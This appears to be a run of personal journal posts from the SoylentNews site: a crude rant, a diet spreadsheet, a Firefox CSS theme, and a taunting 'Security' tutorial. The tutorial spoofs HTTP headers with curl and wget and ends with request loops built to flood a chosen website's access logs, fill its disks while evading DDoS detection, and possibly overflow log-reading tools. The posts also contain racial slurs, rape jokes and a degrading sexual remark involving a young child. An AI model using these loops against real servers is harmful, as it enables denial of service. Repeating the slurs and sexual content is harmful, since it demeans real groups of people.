cocaine overdose (6886)


Currently: In the dunce chair. "Due to excessive bad posting from this IP or Subnet, comment posting has temporarily been disabled. If it's you, consider this a chance to sit in the timeout corner. "
Friday March 23, 18
02:29 AM
/dev/random

my cat. I worked hard for those 50 karma points and then some woman comes around, who you let into your private abode, eats your food, takes your sweatshirts, tries to elope with some Indian tech support monkey, and takes a metaphorical piss on your good name.

I consider this nonconsensual ultra rape. I've now lost 30 Bangladeshi toilet credits, where I normally would've only lost 20 for my outspoken opinions on societal norms in relation to intra-personal communication.

And she didn't bring the teriyaki I asked for. It's Teriyaki Thursday; why would you do this? Please, control your BPD for one night so I can masturbate with a good conscience. And take your risperidone.

Alarge Hoe, you will rue the day you decided to replace my white-bread toasts with rye.

P.S. Please return my lotion to its proper place; my knees are getting ashy.

EDIT: NO HOLDS BARRED. WE'RE DOWN TO 4 SPAM MODS AND -2 NEW DELPHI POGS. SHE'S CRASHING THIS perfectly legitimate and civilized debater WITH NO SURVIVORS.

EDIT2: I have been barred from posting witty and thought-provoking free-style prose. There was one especially rebellious and introspective piece I had lined up, but I'm unable to get the satisfaction of getting the last quip in. Nor am I able to post anymore for another solar cycle.

EDIT3: In their infinite wisdom, the grand retard wranglers of Soylent News have given me back my manhood and I may rape and pillage once more. For this, I offer you one free redeemable coupon for a commissioned, post-societal portrait, created with bodily fluids, and a Whopper value meal.

Thursday March 22, 18
02:45 PM
Code

I've been using this for a couple of years now and it's worked well for me. It's based on the Katch-McArdle formula for RDEE, Lyle McDonald's "Modified Protein Sparing Fast," information about muscle/fat/calorie partitioning, and some of my own research that's proven practical.

Don't mind the errors; they'll go away once the inputs are all filled in correctly.

https://docs.google.com/spreadsheets/d/1VHsmkvRTai_cdcFlb8mfPF0RUci44c-snYx_JRMGa7A/edit?usp=sharing

https://mega.nz/#!NpRGVCZK!_yVwFIXIARexA6EgnOtNzs8fwTxVOZCuVIFLfAVGjhI

https://a.pomf.cat/egqrfx.xlsx
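
For reference, the Katch-McArdle resting energy estimate the sheet is built on can be sketched in shell. The weight and body-fat numbers below are made-up example inputs, not values from the spreadsheet:

```shell
# Katch-McArdle RDEE: 370 + 21.6 * lean body mass (kg).
# weight_kg and bodyfat_pct are example inputs, not anything from the sheet.
weight_kg=80
bodyfat_pct=15
lbm=$(awk -v w="$weight_kg" -v bf="$bodyfat_pct" 'BEGIN { printf "%.1f", w * (1 - bf / 100) }')
rdee=$(awk -v l="$lbm" 'BEGIN { printf "%.0f", 370 + 21.6 * l }')
echo "LBM: ${lbm} kg, RDEE: ${rdee} kcal/day"
```

Plug in your own numbers; the sheet then layers the partitioning and PSF math on top of this baseline.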

Sunday March 18, 18
08:30 PM
Code
I was working on a prank that never came around, and it involved a new theme I whipped up. Though I found out, after I was finished, that it looks a lot like the "Chillax" theme, I'm still satisfied with the result.

It's a less dead-inside Chillax (and it makes already-read comments easier to spot). You can set it up using Firefox's userContent.css:

@-moz-document domain("soylentnews.org") {
    body {
        background: #d1d9ff !important;
    }
    .generaltitle div.title, .article div.title, .search-results h4 {
        background-color: #101872 !important;
        background: linear-gradient(#101872, #212fcb) !important;
        border-radius: 10px 10px 0 0 !important;
    }
    #logo h1 a {
        background: url("soylent.png") no-repeat !important;
        background-size: 115px 80px !important;
    }
    a, .menu li a {
        color: #006 !important;
    }
    .generaltitle h3 a, .generaltitle h3 a:visited, .search-results h4 a, .search-results h4 a:visited {
        color: #fff !important;
    }
    .logout a {
        background: #342fe6 !important;
        color: #fff !important;
    }
    .more a {
        background-color: #342fe6 !important;
        color: #fff !important;
    }
    .title, .user {
        background: #8792ba !important;
    }
    #you, #journal .article h3 a, #journal .article h3 a:visited {
        color: #fff !important;
    }
    input[type="submit"], button[type="submit"], .logout a, div.storylinks ul li.more a, .nbutton b a {
        background: #342fe6 !important;
        color: #fff !important;
    }
    .commentBox, .data_head {
        background: #2d28d5 !important;
    }
    #links a, #links a:visited, .details a, .details a span, .details, .details a span a {
        color: #020c83 !important;
        text-decoration: none !important;
    }
    #slogan * {
        color: #001e9f !important;
    }
    .commentTop .title {
        background: #342fe6 !important;
    }
    .dimmed .commentTop .title {
        background: #8792ba !important;
    }
    #usermenu ul.menu li a {
        background: #342fe6 !important;
        color: #fff !important;
    }
    #usermenu ul.menu li.selected a {
        background: #444287 !important;
    }
}

And the logo: https://i.imgur.com/pOLn9tb.png
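
If it helps, here's roughly where that file goes. The chrome/ subdirectory of your Firefox profile is the real location; PROFILE_DIR below is a stand-in (it defaults to a temp dir just for the sketch), so point it at your actual profile:

```shell
# userContent.css lives in <firefox profile>/chrome/.
# PROFILE_DIR is an assumption; set it to something like
# ~/.mozilla/firefox/xxxxxxxx.default on a stock Linux install.
PROFILE_DIR="${PROFILE_DIR:-$(mktemp -d)}"
mkdir -p "$PROFILE_DIR/chrome"
# Paste the whole @-moz-document block into userContent.css
# (a one-rule placeholder is written here for the sketch):
printf '@-moz-document domain("soylentnews.org") { /* theme rules here */ }\n' \
    > "$PROFILE_DIR/chrome/userContent.css"
# Drop the logo next to it; url("soylent.png") resolves relative to the CSS file.
echo "theme installed under $PROFILE_DIR/chrome/"
```

Restart Firefox afterwards; userContent.css is only read at startup.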
Saturday March 17, 18
02:43 AM
Security

What's popping my fellow internet professionals. Today I'm going to learn you well about the fun shit you can do with HTTP headers.

You'll need:

  • A lUnix distro
  • Curl + Wget
  • 47 IQ points
  • Run

    export WEBSITE=www.google.com

where "www.google.com" can be any website you want. For these demonstrations, I'll be using my own bare Nginx server over 1 Gb Ethernet.

If you have none of the above, please consider a different news source. Now, let's begin.

You know about user agents, right? Big bad advertisers want em for "sample sizing" to prop up their numbers. Webmasters want em to "enhance user experience," by selling your data to advertisers. The NSA/webmasters/advertisers want em to track you for all sorts of reasons. I'm sure you know you can change these bad boys however you wish, right? Maybe you've even fiddled around with changing it to "GoogleBot" or something else completely silly. Pretty lame, right?

Naw, my friends, let me introduce you to some cooler shit you can do. Like telling the server monkey / analytics scraper to

wget -U "Go fuck yourself." $WEBSITE

Begets:

10.0.0.10 - - [16/Mar/2018:21:08:38 -0400] "GET / HTTP/1.1" 200 2682 "-" "Go fuck yourself."

Maybe you want something a bit more subtle?

wget -U "I know what you've done." $WEBSITE

Is:

10.0.0.10 - - [16/Mar/2018:21:09:42 -0400] "GET / HTTP/1.1" 200 2682 "-" "I know what you've done."

Still pretty lame. But did you know these can be arbitrarily long? Bet ya didn't, you lil bugger. Let's try something a bit more interesting, like sending love letters.

wget -U "Dear Underpaid Overweight Mediocre Server Monkey, you probably don't know who I am, but I know very well who you are. Don't be alarmed, I've been admiring you from afar for all too long now. Your stunning good looks: the acne that hasn't left you since childhood, makes me blush everytime I see those snow-capped volcanoes. And your greasy over-grown beard, I just can't help myself from thinking about how it'd feel scratching against my lady no-nos. Ohh..."'!~~~'" I just can't watch you anymore, I want you to know I exist. But, I don't know how, so I'm writing you here. Hopefully you'll notice me. Pleaes notice me, senpai"'!'"~ Your truly, Emelia." $WEBSITE

Really gets those penile juices flowing, right?:

10.0.0.10 - - [16/Mar/2018:21:18:27 -0400] "GET / HTTP/1.1" 200 2682 "-" "Dear Underpaid Overweight Mediocre Server Monkey, you probably don't know who I am, but I know very well who you are. Don't be alarmed, I've been admiring you from afar for all too long now. Your stunning good looks: the acne that hasn't left you since childhood, makes me blush everytime I see those snow-capped volcanoes. And your greasy over-grown beard, I just can't help myself from thinking about how it'd feel scratching against my lady no-nos. Ohh...!~~~ I just can't watch you anymore, I want you to know I exist. But, I don't know how, so I'm writing you here. Hopefully you'll notice me. Pleaes notice me, senpai!~ Your truly, Emelia."

Maybe you've also noticed that there's a big fat "GET / HTTP/1.1" sitting there, ripe for the taking. You'd be an astute little bugger if you did. We can change that shit right around with:

wget -U "Go fuck yourself." --method="Go fuck yourself" $WEBSITE

Unfortunately, if the method's borked there won't be no UA:

10.0.0.10 - - [16/Mar/2018:21:22:25 -0400] "GO FUCK YOURSELF / HTTP/1.1" 400 173 "-" "-"

One thing I forgot to mention: by default, these logs are formatted like

$remote_addr - $remote_user [$time_local] "$request" $status $body_bytes_sent "$http_referer" "$http_user_agent"

So that means we can spoof $remote_user by doing:

curl mom@$WEBSITE --user-agent "Hi honey, just wanted to let you know my new boyfriend's coming over for dinner tonight. Please be nice to, Jayquan"'!'

To get:

10.0.0.10 - mom [16/Mar/2018:21:31:46 -0400] "GET / HTTP/1.1" 200 2682 "-" "Hi honey, just wanted to let you know my new boyfriend's coming over for dinner tonight. Please be nice to, Jayquan!"
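
For the curious, that layout is nginx's stock "combined" log format. In nginx.conf it's defined roughly like this (this is the documented default, not something special from my server config):

```nginx
log_format combined '$remote_addr - $remote_user [$time_local] '
                    '"$request" $status $body_bytes_sent '
                    '"$http_referer" "$http_user_agent"';
```

Every field we've been poking at ($remote_user, $request, $http_referer, $http_user_agent) comes straight from the request, which is why this whole game works.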

Or our humble referrer, for those social engineering points:

curl paulgraham@$WEBSITE --user-agent "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; Windows 98)" -e "https://news.ycombinator.com/"

For:

10.0.0.10 - paulgraham [16/Mar/2018:21:35:25 -0400] "GET / HTTP/1.1" 200 2682 "https://news.ycombinator.com/" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; Windows 98)"

"Buh wha bout muh bites?" you may quander. Well, we can do that too.

curl paulgraham@$WEBSITE --user-agent "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; Windows 98)" -e "https://news.ycombinator.com/" -H "Diaper-Status: SOILED"

Ah well shit, seems like we can't:

10.0.0.10 - paulgraham [16/Mar/2018:21:38:01 -0400] "GET / HTTP/1.1" 200 2682 "https://news.ycombinator.com/" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; Windows 98)"

Or can we?

curl paulgraham@$WEBSITE --user-agent "MY ADULT DIAPER NEEDS TO BE CHANGED URGENTLY. I REQUIRE A BOY OF 7 YEARS FROM COLUMBIA TO WIPE THE FECES FROM WITHIN MY ASS ROLLS TO WITHOUT INTO THE FRESH AIR. AGAIN, THIS REQUEST IS URGENT AND MUST BE ACCEPTED." -e "https://news.ycombinator.com/"

No we can't, because my dyslexia forgot the "body" in "body_bytes_sent": that field counts the bytes the server sent back, not anything we send it. Well, anyway, this is just child's shit, or should I say Graham's shit? There's practically no limit to any of the strings. So you can do something like:

wget -U "$(printf "%0.sA" {1..100})" $WEBSITE

To get:

10.0.0.10 - - [16/Mar/2018:22:05:59 -0400] "GET / HTTP/1.1" 200 2682 "-" "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
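
In case that printf incantation looks like line noise: printf reuses its format string for every argument, and %0.s prints each brace-expanded number with zero precision (i.e. nothing), leaving one literal "A" per argument. A quick sanity check:

```shell
# One "A" per argument of the brace expansion: {1..100} -> 100 As.
payload=$(printf "%0.sA" {1..100})
echo "${#payload}"
```

That echoes 100, the length of the payload.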

Or:

solid_shit=$(printf "%0.sA" {1..1000}); wget -U "$solid_shit" $WEBSITE

For:

10.0.0.10 - - [16/Mar/2018:22:06:29 -0400] "GET / HTTP/1.1" 200 2682 "-" "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"

How about:

curl --user-agent "$(printf "%0.sA" {1..10000})" $WEBSITE

Too bad: it returns a 400 "too long" error and the log doesn't show our UA. The largest I could get through was 8178 As, which, after a bit of trial and error, gets me a 1 MB nginx access.log. We can get past that with:

for i in {1..12}; do curl --user-agent "$(printf "%0.sA" {1..8178})" $WEBSITE; done

Gives us 97 KB of As in the logfile. Changing that to 200 gives us 1.6 MB, and 10,000 gets us 79 MB. Extrapolating, we'd need around 120 million requests to fill up an entire 1 TB hard drive. If we wanted to avoid sounding the DDoS alarms, we could request only the 217-byte headers:

for i in {1..10000}; do curl -I --user-agent "$(printf "%0.sA" {1..8178})" $WEBSITE; done

That would still get the same result, but the load on the server would be much less noticeable. Props if you can find a small file (preferably 1 B) to download instead. Generally speaking, you could set up a small timer to curl on through the weekend and fill up some hard drives. Usually the logs are monitored by tools or automatically backed up, and that can cause some havoc on its own. But the real meat is with the tools that reference those logs, or reference the headers in raw form. You can probably cause some buffer overflows in old C programs that are still running, or cause whatever tools are interfacing with the headers to snap like an over-extended spine during an OHP. Do with this info whatever you want; I'm only here to try out this journal system.